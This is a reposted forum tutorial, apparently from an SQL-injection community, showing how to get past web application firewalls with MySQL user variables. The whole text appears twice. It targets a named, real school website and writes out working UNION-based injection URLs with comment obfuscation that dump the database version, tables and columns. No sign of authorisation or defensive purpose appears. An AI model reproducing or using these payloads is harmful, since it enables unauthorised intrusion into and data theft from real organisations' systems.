Newest Post
// Posted by :Unknown
// On :Senin, 13 Februari 2017
hello frnds,
today we will discuss about how to bypass hard waf filters with local varaible when regular formats for dumping data are not working then this is a best alternative to try to bypass hard filters and it wont work everytime ******
ok lets start.***
ill explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and i got the vulnerable coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and lets dump tables and coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
we have tried all the ways to bypass waf but didnt worked, now lets try with local variable.***
Local variable is a simply a value holder, it will hold a certain value and it will give output when command is executed,so lets see it practically,
see the below query i opned a variable with name "sqli" and stored a value there , and i placed that variable in the vulnerable coloumn which will show output when query is executed.***
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
![[Image: vxu1l.png]](https://i68.tinypic.com/vxu1l.png)
like wise now lets dump data [tables and coloumns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
![[Image: 2q8964g.png]](https://i65.tinypic.com/2q8964g.png)
hope u are clear with this and thats all for this tutorial
my next tutorial will be on bypassing hard waf filters with cookie based injection.***
plzz give ur feedback about my tutorial
thank u
cyaa !
today we will discuss about how to bypass hard waf filters with local varaible when regular formats for dumping data are not working then this is a best alternative to try to bypass hard filters and it wont work everytime ******
ok lets start.***
ill explain it on a live site,
site>> http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=8
and i got the vulnerable coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,3,4--+
and lets dump tables and coloumns
http://www.kantipurinternational.edu.np/ pages/ facilities_details.php?id=.8' /*!50000UNION*/+SELECT+1,2,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),4--+
result >> 403 forbidden
we have tried all the ways to bypass waf but didnt worked, now lets try with local variable.***
Local variable is a simply a value holder, it will hold a certain value and it will give output when command is executed,so lets see it practically,
see the below query i opned a variable with name "sqli" and stored a value there , and i placed that variable in the vulnerable coloumn which will show output when query is executed.***
http://www.kantipurinternational.edu.np/ pages /facilities_details.php?id=.8' and @sqli:=(seLeCt concat/**/(version())) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
output
![[Image: vxu1l.png]](https://i68.tinypic.com/vxu1l.png)
like wise now lets dump data [tables and coloumns]
http://www.kantipurinternational.edu.np/....php?id=.8' and @sqli:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_naMe*/,0x20203a3a2020,/*!50000ColuMN_naMe*/) FrOm /*!50000information_schema.columns*/ where table_schema=database/**_**/()) /*!50000UNION*/+SELECT+1,2,@sqli,4--+
and the output
![[Image: 2q8964g.png]](https://i65.tinypic.com/2q8964g.png)
hope u are clear with this and thats all for this tutorial

my next tutorial will be on bypassing hard waf filters with cookie based injection.***
plzz give ur feedback about my tutorial
thank u
cyaa !

source http://forum.sqliwiki.com/showthread.php?tid=4164